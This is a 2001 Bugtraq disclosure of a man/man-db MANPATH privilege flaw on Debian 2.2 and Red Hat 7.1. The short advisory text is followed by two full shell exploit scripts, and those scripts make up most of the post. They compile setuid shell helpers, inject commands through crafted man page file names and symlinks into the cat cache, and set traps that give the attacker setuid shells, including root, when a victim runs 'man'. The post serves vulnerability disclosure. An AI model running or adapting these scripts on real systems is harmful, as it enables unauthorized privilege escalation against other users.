man/man-db MANPATH bugs exploit
Date: Mon, 4 Jun 2001 13:03:04 +0700
From: "Luki R ." <luki@karet.org>
To: bugtraq@securityfocus.com
Subject: man/man-db MANPATH bugs exploit
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Hi,
In some conditions, man allow user's PATH env. to be inserted as manpath.
Man then use manpath value for searching directories contain manpages.
This is ok until man forgot to drop privilledges when creating cat pages
cache files using user's supplied PATH.
I've successfully try this on 2 different man system, debian's and redhat's.
Yes, this is not a new bugs since debian hax fixed it on man-db 2.3.18-6
in unstable (hi Colin Watson :)) and 2.3.16-4.
and for redhat see redhat's bugzilla #43213
Sorry if this is already mentioned before.
Attached is a complete proof of concept exploit script for
redhat7.1 and Debian2.2. for your convenience.
I just want to say that the impact is not only creating files owned by man
uid/gid but combined with symlinks and other tricks, the results are:
[1] On debian's man-db (<= 2.3.17-3.2, 2.3.16-3):
instant user 'man' setuid shell
(as user 'man' you may do something tricky to be root)
[2] On RedHat's man (<= man-1.5h1-20):
(trivial) executing any binary, ie. to make any user's suidshell,
including root
However, to produce a succesfull exploit we must met the conditions:
- man system that write catpages cache [1] & [2]
- suid / sgid man binaries [1] & [2] (to be able to write to cache dirs)
- there is a command which have no manpages (coz we will create it ;p ) [2]
- victim user must then executed 'man <command with no manpage>' [2]
see the exploits for details.
Have a nice day,
[----- jenggo (luki@karet.org) -----]
PS:
(halo, ada yg tertarik untuk ngulik supaya jadi root di redhat ? ;P)
trully greets to: echo, mayonaise and others @ #karet
Mr.gus, mega, amien, akbar ...damai, damai
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#!/bin/sh
###################################################
# Fri Jun 1 23:00:10 JAVT 2001 #
# ----------------------------------------------- #
# man MANPATH symlink redirection bugs #
# proof of concept. #
# version affected: #
# <= man-db 2.3.16-3,2.3.17-3.2 #
# #
# tested on: #
# debian2.2 -> instant man suidshell #
# #
# by jenggo <luki@karet.org> #
# #
# thanx to: echo, mayonaise all @ #karet #
# ==> Mr.dur,amien,mega,akbar ... damai,damai ;) #
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TMPDIR=/tmp/mywork
RAND=`/bin/date +%S`
echo "making working dir ..."
/bin/mkdir -p $TMPDIR/man/man1
/bin/chmod 777 $TMPDIR
/bin/chmod 777 $TMPDIR/man
echo "copying needed files ..."
if [ ! -x /usr/bin/groff ] || [ ! -x /usr/bin/grotty ] || [ ! -x /usr/bin/troff ] || [ ! -x /usr/bin/gcc ]; then
echo "Failed, I need executable : groff,grotty,troff,gcc"
echo "cleaning up ..."
/bin/rm -rf $TMPDIR
fi
/bin/cp /usr/bin/groff $TMPDIR
/bin/cp /usr/bin/grotty $TMPDIR
/bin/cp /usr/bin/troff $TMPDIR
echo "compiling helper ..."
/bin/cat > $TMPDIR/hehe.c <<EOF
#include <stdio.h>
int main()
{
char *aa[2]={"/bin/sh", NULL};
setreuid(6,6);
execve(aa[0], aa, NULL);
exit(0);
}
EOF
/usr/bin/gcc $TMPDIR/hehe.c -o $TMPDIR/hehe 2>/dev/null 1>/dev/null
/bin/cat > $TMPDIR/mandeb.c <<EOF
#include <stdio.h>
int main()
{
seteuid(6);
setuid(6);
system("/bin/cp /tmp/mywork/hehe /tmp/huhu");
system("/bin/chown man /tmp/huhu");
system("/bin/chmod 4755 /tmp/huhu");
exit(0);
}
EOF
/usr/bin/gcc $TMPDIR/mandeb.c -o $TMPDIR/mandeb 2>/dev/null 1>/dev/null
echo "making our manpage ..."
/bin/ln -s /var/cache/man/cat1 $TMPDIR/man/cat1
/bin/echo "bebas euy"|/bin/gzip -c > $TMPDIR/man/man1/"cihuy$RAND.1.gz;cd ..;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mywork;export PATH=.;mandeb;echo ls.1.gz"
/bin/touch $TMPDIR/"cihuy$RAND.1.gz;cd ..;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mywork;export PATH=.;mandeb;echo ls"
export PATH=$TMPDIR
/usr/bin/man "cihuy$RAND.1.gz;cd ..;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mywork;export PATH=.;mandeb;echo ls" 2> /dev/null 1>/dev/null
echo "/bin/ls -la /var/cache/man/cat1"
/bin/ls -la /var/cache/man/cat1
export PATH=/var/cache:/bin:/sbin:/usr/bin:/usr/sbin
echo "exploiting ..."
/bin/rm -f /tmp/huhu
/usr/lib/man-db/mandb 2>/dev/null 1>/dev/null
/bin/rm -rf /tmp/mywork
echo
echo "/bin/ls -la /tmp"
/bin/ls -la /tmp
if [ -u /tmp/huhu ]; then
echo "file /tmp/huhu is setuid. Hope it's owned by man"
echo "Have a nice day"
echo "[----- jenggo <luki@karet.org> -----]"
/tmp/huhu
else
echo "exploit failed, cleaning up our binary ..."
fi
echo "cleaning up our preparation step dir ..."
/bin/rm -rf /tmp/$TMPDIR
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#!/bin/sh
###################################################
# Fri May 18 22:08:42 JAVT 2001 #
# ----------------------------------------------- #
# man MANPATH symlink redirection bugs #
# proof of concept. #
# version affected: #
# <= man-1.5h1-20 #
# #
# tested on: #
# redhat7.1 -> any user suidshell #
# #
# by jenggo <luki@karet.org> #
# #
# thanx to: echo, mayonaise all @ #karet #
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# hmmm ... ada yang bisa modif jadi instant root ?? :P
# IMPORTANT !
# set this to command that has no man page
DEADLY_BIN="netconf"
# on <= redhat6.2 could be /var/cache/catman
CACHEDIR="/var/cache/man"
CACHEDIR2="/var/cache/catman"
GZ="/bin/gzip"
echo -n "check man dir ..."
if [ ! -d $CACHEDIR ]; then
if [ -d $CACHEDIR2 ]; then
CACHEDIR=$CACHEDIR2
echo "OK"
else
echo "FAILED"
echo "check your man dir"
exit
fi
else
echo "OK"
fi
echo -n "checking sgid/suid man ..."
if [ ! -g /usr/bin/man ]; then
# is it a debian man?
if [ -d /usr/lib/man-db ]; then
echo "FAILED"
echo "I think this is debian style man, use other script"
else
echo "FAILED"
echo "can't find executables sgid man binary"
fi
exit
else
echo "OK"
fi
echo "making our man directory ..."
echo
mkdir -p /tmp/man/man1
mkdir /tmp/cat1
mkdir /tmp/mine
chmod 777 /tmp/mine
echo "creating our man page ..."
echo
echo "BEBAS EUY"|$GZ -c > /tmp/man/man1/huhuy.1.gz
echo "creating symlink ..."
echo
ln -s "$CACHEDIR/cat1/netconf.1.gz;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mine;export PATH=.;manx" /tmp/cat1/huhuy.1.gz
echo "creating our bogus command ..."
echo
touch /tmp/huhuy
echo "making manx shellscript"
echo
/bin/cat > /tmp/mine/manx <<EOF
#!/bin/sh
export PATH="/bin:/usr/bin:/sbin:/usr/sbin"
VICTIM=\`/usr/bin/id -u\`
/bin/cat >/tmp/mine/my"\$VICTIM".c <<EOG
#include <stdio.h>
void main()
{
char *hh[2]={"/bin/sh", NULL};
setreuid(\$VICTIM,\$VICTIM);
execve(hh[0], hh, NULL);
}
EOG
/usr/bin/gcc /tmp/mine/my"\$VICTIM".c -o /tmp/mine/my\$VICTIM 1>/dev/null 2>/dev/null
/bin/rm -f /tmp/mine/my"\$VICTIM".c 1>/dev/null 2>/dev/null
chmod 6755 /tmp/mine/my\$VICTIM 1>/dev/null 2>/dev/null
EOF
chmod 755 /tmp/mine/manx
if [ ! -x /tmp/mine/manx ]; then
echo "file: /tmp/mine/manx can't be set executable !"
echo "fix the exploit first"
echo "cleaning up ..."
/bin/rm -rf /tmp/man /tmp/cat1 /tmp/mine /tmp/huhuy
exit
fi
echo "prepare to exploit ..."
echo
export PATH=../../../../../../tmp
cd /
echo "exploiting ..."
echo
/usr/bin/man -d huhuy 2>/dev/null
export PATH=/bin:/usr/bin
echo "checking our exploit result"
echo
if [ -f "/var/cache/man/cat1/$DEADLY_BIN.1.gz;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mine;export PATH=.;manx" ]; then
echo "content of $CACHEDIR/cat1:"
ls -l $CACHEDIR/cat1
echo
echo "exploit OK, now wait till somebody run 'man $DEADLY_BIN'"
echo "and your suidshells will be waiting at /tmp/mine/* :)"
echo "bye."
echo "[-------- jenggo <luki@karet.org> --------]"
echo
else
echo "hrrmm ... exploit failed to create offending file !"
echo "check again please"
echo "cleaning up ..."
/bin/rm -rf /tmp/man /tmp/cat1 /tmp/mine /tmp/huhuy
fi
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